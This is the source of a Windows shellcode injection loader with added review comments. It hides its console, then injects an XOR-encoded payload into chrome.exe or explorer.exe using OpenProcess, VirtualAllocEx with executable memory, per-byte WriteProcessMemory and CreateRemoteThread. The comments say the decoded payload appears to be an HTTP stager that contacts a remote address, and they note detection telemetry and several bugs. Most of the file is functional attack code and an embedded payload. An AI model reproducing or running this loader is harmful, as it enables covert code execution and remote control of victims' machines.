
#include <windows.h>
#include <stdio.h>
#include "connector.h"
//coded by orca666

// Entry point of a process-injection loader. Everything it does is visible below, in order:
// hide its own console window; obtain a chrome.exe PID from find2() (falling back to an
// explorer.exe PID from find()); OpenProcess(PROCESS_ALL_ACCESS); VirtualAllocEx with
// PAGE_EXECUTE_READWRITE in that process; WriteProcessMemory of an XOR-decoded byte string,
// one byte per call; CreateRemoteThread at the allocated buffer; wait for it to finish.
// NOTE(review): this is the textbook remote-thread injection chain, and every step is
// high-signal telemetry for defenders: the handle open (Sysmon event 10), the cross-process
// RWX allocation/write (a stand-alone EDR heuristic) and the remote thread (Sysmon event 8).
// NOTE(review): the file compiles only as C++ — it uses a function-style LPVOID(...) cast
// and `bool` without <stdbool.h> — even though it was tagged as C.
// find()/find2() are declared in connector.h, which is not visible here; the failure value
// they return is only inferred from the checks below — confirm against connector.h.
// argc/argv are unused; main falls off the end without a return (permitted for C++ main).
int main(int argc, char* argv[]) {
    HWND hWnd = GetConsoleWindow();
    // Minimise, then hide, the loader's own console so nothing stays visible on the desktop.
    ShowWindow(hWnd, SW_MINIMIZE);
    ShowWindow(hWnd, SW_HIDE);
     

    // XOR-encoded payload; see the decode loop further down. Because it is a string literal,
    // sizeof(shellcode) also counts the implicit trailing '\0'.
    // NOTE(review): as listed, the literal is split across two lines with no line
    // continuation, which is a compile error — presumably a line-wrap artefact of the listing.
    // NOTE(review): decoding with the folded key byte (0x45, computed from the loop below)
    // appears to yield an `fc 48 83 e4 f0` prologue plus printable fragments including an
    // HTTP User-Agent string and a dotted-quad address, i.e. what looks like an x64 HTTP
    // stager — confirm in a sandbox rather than trusting this static read.
    unsigned char shellcode[] = "\xb9\xd\xc6\xa1\xb5\xad\x8d\x45\x45\x45\x4\x14\x4\x15\x17\x14\x13\xd\x74\x97\x20\xd\xce\x17\x25\xd\xce\x17\x5d\xd\xce\x17\x65\xd\xce\x37\x15\xd\x4a\xf2\xf\xf\x8\x74\x8c\xd\x74\x85\xe9\x79\x24\x39\x47\x69\x65\x4\x84\x8c\x48\x4\x44\x84\xa7\xa8\x17\x4\x14\xd\xce\x17\x65\xce\x7\x79\xd\x44\x95\x23\xc4\x3d\x5d\x4e\x47\x30\x37\xce\xc5\xcd\x45\x45\x45\xd\xc0\x85\x31\x22\xd\x44\x95\x15\xce\xd\x5d\x1\xce\x5\x65\xc\x44\x95\xa6\x13\xd\xba\x8c\x4\xce\x71\xcd\xd\x44\x93\x8\x74\x8c\xd\x74\x85\xe9\x4\x84\x8c\x48\x4\x44\x84\x7d\xa5\x30\xb4\x9\x46\x9\x61\x4d\x0\x7c\x94\x30\x9d\x1d\x1\xce\x5\x61\xc\x44\x95\x23\x4\xce\x49\xd\x1\xce\x5\x59\xc\x44\x95\x4\xce\x41\xcd\xd\x44\x95\x4\x1d\x4\x1d\x1b\x1c\x1f\x4\x1d\x4\x1c\x4\x1f\xd\xc6\xa9\x65\x4\x17\xba\xa5\x1d\x4\x1c\x1f\xd\xce\x57\xac\xa\xba\xba\xba\x18\x2f\x45\xc\xfb\x32\x2c\x2b\x2c\x2b\x20\x31\x45\x4\x13\xc\xcc\xa3\x9\xcc\xb4\x4\xff\x9\x32\x63\x42\xba\x90\xd\x74\x8c\xd\x74\x97\x8\x74\x85\x8\x74\x8c\x4\x15\x4\x15\x4\xff\x7f\x13\x3c\xe2\xba\x90\xae\x36\x1f\xd\xcc\x84\x4\xfd\xc2\x40\x45\x45\x8\x74\x8c\x4\x14\x4\x14\x2f\x46\x4\x14\x4\xff\x12\xcc\xda\x83\xba\x90\xae\x1c\x1e\xd\xcc\x84\xd\x74\x97\xc\xcc\x9d\x8\x74\x8c\x17\x2d\x45\x47\x5\xc1\x17\x17\x4\xff\xae\x10\x6b\x7e\xba\x90\xd\xcc\x83\xd\xc6\x86\x15\x2f\x4f\x1a\xd\xcc\xb4\xd\xcc\x9f\xc\x82\x85\xba\xba\xba\xba\x8\x74\x8c\x17\x17\x4\xff\x68\x43\x5d\x3e\xba\x90\xc0\x85\x4a\xc0\xd8\x44\x45\x45\xd\xba\x8a\x4a\xc1\xc9\x44\x45\x45\xae\x96\xac\xa1\x44\x45\x45\xad\xe7\xba\xba\xba\x6a\x14\xb\xa\x2a\x45\x3c\xc3\xce\x18\xfc\xd2\x20\x29\x90\xbd\x68\x7a\xf7\x62\x78\x42\xa1\x89\x23\xfc\xcb\xb4\x60\x8c\xc0\x2\xf8\x3d\x4c\xa8\xae\x8f\xcf\xa0\xe6\x1\xe5\x83\x34\xc1\x1a\x5e\x5e\x57\xd2\xa4\xbc\x55\xf9\xd3\x69\xa4\xd6\xf9\xca\xb5\x72\x80\xa6\x71\xa4\xa6\x20\x0\x17\xa5\x60\xff\x3d\x3a\xc2\xf7\x35\x45\x10\x36\x20\x37\x68\x4\x22\x20\x2b\x31\x7f\x65\x8\x2a\x3f\x2c\x29\x29\x24\x6a\x70\x6b\x75\x65\x6d\x12\x2c\x2b\x21\x2a\x32\x36\x65\xb\x11\x65\x73\x6b\x74\x7e\x65\x11\x37\x2c\x21\x20
\x2b\x31\x6a\x72\x6b\x75\x7e\x65\x37\x33\x7f\x74\x74\x6b\x75\x6c\x65\x29\x2c\x2e\x20\x65\x2\x20\x26\x2e\x2a\x48\x4f\x45\x2f\x27\x59\xe5\x47\xec\xec\x22\xd2\xd0\x12\x33\x87\x9a\x8f\x9\xc5\x7f\xcd\x11\xf4\xa1\x79\xd6\x30\xf3\x15\x5e\x7\xee\x4c\xdc\x79\x4\x20\x16\x68\xe4\x9\xbc\xd0\xb3\x39\xfa\xd6\x5c\x92\x60\xab\x4\x29\xce\xf0\x59\x8c\x67\xee\xdb\xc2\x49\x71\xd\xd1\xbb\x69\x16\x6c\xc7\xc3\x5f\x40\x66\x71\x13\x4b\x1a\x35\x28\x16\x55\x33\x64\x46\x6e\x39\xc1\x49\x94\x6e\xa7\x68\x21\x50\x98\xd\x4e\x63\x4\xcb\x48\xda\x3a\x20\x90\xe5\x33\x1b\x1d\x70\x7d\x87\x39\xc1\x2d\x13\xc5\x69\xdd\xc9\xd5\xed\xea\xc3\x7\x58\x6\x85\x95\x87\x87\x3c\x55\xec\x83\x20\x38\x1b\xa6\x4c\x1a\x4a\x35\xc\x83\x44\x98\x50\x4d\x3d\xe1\x8b\x9c\x95\xc0\x1b\x68\x6\x83\x13\x90\x90\x9a\xbb\x38\x5a\x18\x83\x9e\x85\x3b\x23\xde\xd6\xbd\x84\x89\x8e\xcb\x52\xde\xb4\x22\x38\x5a\x1\xd5\x75\xdd\x2e\x52\xfe\xa6\xb7\xe8\x3d\xff\x7c\x10\x5d\xe\x44\x1b\x54\xf3\xf1\xb4\x39\xc\x1d\x4c\xc1\x97\x63\x4e\x80\x84\xf\x23\xe0\x19\xdb\x88\xb5\xf7\x68\x14\x98\x45\x4\xfb\xb5\xf0\xe7\x13\xba\x90\xd\x74\x8c\xff\x45\x45\x5\x45\x4\xfd\x45\x55\x45\x45\x4\xfc\x5\x45\x45\x45\x4\xff\x1d\xe1\x16\xa0\xba\x90\xd\xd6\x16\x16\xd\xcc\xa2\xd\xcc\xb4\xd\xcc\x9f\x4\xfd\x45\x65\x45\x45\xc\xcc\xbc\x4\xff\x57\xd3\xcc\xa7\xba\x90\xd\xc6\x81\x65\xc0\x85\x31\xf3\x23\xce\x42\xd\x44\x86\xc0\x85\x30\x92\x1d\x1d\x1d\xd\x40\x45\x45\x45\x45\x15\x86\xad\xda\xb8\xba\xba\x74\x7c\x77\x6b\x74\x73\x7d\x6b\x74\x73\x6b\x74\x75\x7d\x45\x5c\x2c\xe5\xc8";

    bool chrome = true;   // true while chrome.exe is the chosen target
    // Target selection: by the message printed below, find2() is expected to return the
    // chrome.exe PID (contract lives in connector.h — not visible here).
    int process_id = find2();

    // NOTE(review): only `process_id > 0` does any work here; `!= -1` is implied by it, and
    // `process_id != NULL` compares an int with the null-pointer constant (a warning or an
    // error depending on how NULL is defined).
    if (process_id > 0 && process_id != -1 && process_id != NULL)
    {
        printf("chrome.exe pid was found : %d .... \n", process_id);
    }

    else {
        printf("chrome process is not open \ninjecting to explorer.exe instead...\n");
        chrome = false;
    }



    int process_id2;   // explorer.exe PID; assigned only on the fallback path

    HANDLE process;    // handle to the injection target; NOTE(review): never closed on any path
    // PROCESS_ALL_ACCESS is far broader than the later calls require. A handle opened with
    // this mask against another user-session process is itself a common detection rule.
    if (chrome == true) {
        printf("injecting to chrome.exe\n");
        process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    }
    else {
        process_id2 = find();
        // NOTE(review): unlike the chrome path, the explorer PID is not validated before use.
        printf("explorer.exe pid was found : %d .... \n", process_id2);
        process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id2);
    }



    LPVOID base_address;   // remote buffer that receives the decoded payload

    if (process) {
        printf("process is opened, continuing ... \n");
        // Commits sizeof(shellcode) bytes as readable+writable+executable in the remote
        // process. Private RWX memory created from another process is a strong EDR indicator.
        base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (base_address) {
            printf("based address is 0x%p\n", base_address);

            int n = 0;   // remote write offset; advances only when a write succeeds


            // NOTE(review): `<=` runs one iteration past the array — shellcode[sizeof(shellcode)]
            // is an out-of-bounds read (undefined behaviour). The terminating '\0' is copied too.
            for (int i = 0; i <= sizeof(shellcode); i++) {
                // since in encoder.py it was : ^ 0x11) ^ 0x52 ) ^ 0xc7) ^ 0xa3) ^ 0xd8) ^ 0x05) ^ 0x32) ^ 0xf7) ^ 0x7a)
                // thus it is  ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11
                // The nine constants fold at compile time into a single key byte (0x45), so the
                // "encoding" is plain single-byte XOR: trivially reversible for an analyst, and
                // every \x45 in the literal above is a zero byte in the decoded payload.
                char DecodedOpCode = shellcode[i] ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11;
                // One WriteProcessMemory call per byte — well over a thousand size-1
                // cross-process writes, a distinctive pattern in API-call telemetry.
                // NOTE(review): a failed write is silently skipped and, because n does not
                // advance, every later byte lands one position earlier than intended.
                if (WriteProcessMemory(process, LPVOID((ULONG_PTR)base_address + n), &DecodedOpCode, 1, NULL)) {
                    n++;
                }

            }
            DWORD threadId = 0;
            printf("Running the thread ...\n");
            // Starts execution at the RWX buffer in the target process.
            // NOTE(review): dwStackSize is 100 bytes; dwCreationFlags (a DWORD) is passed
            // NULL; the returned handle is neither checked nor closed, so a NULL thread
            // handle reaches WaitForSingleObject below.
            HANDLE thread = CreateRemoteThread(process, NULL, 100, (LPTHREAD_START_ROUTINE)base_address, NULL, NULL, &threadId);
            WaitForSingleObject(thread, INFINITE);
            printf("The thread finished!\n");
        }
        else {
            printf("Unable to allocate memory ... \n");
        }
    }
    else {
        // NOTE(review): typo in the user-facing string ("Enable" for "Unable") — left as is
        // because changing runtime strings is out of scope for a documentation pass.
        printf("Enable to retrieve process handle ...\n");
    }
}
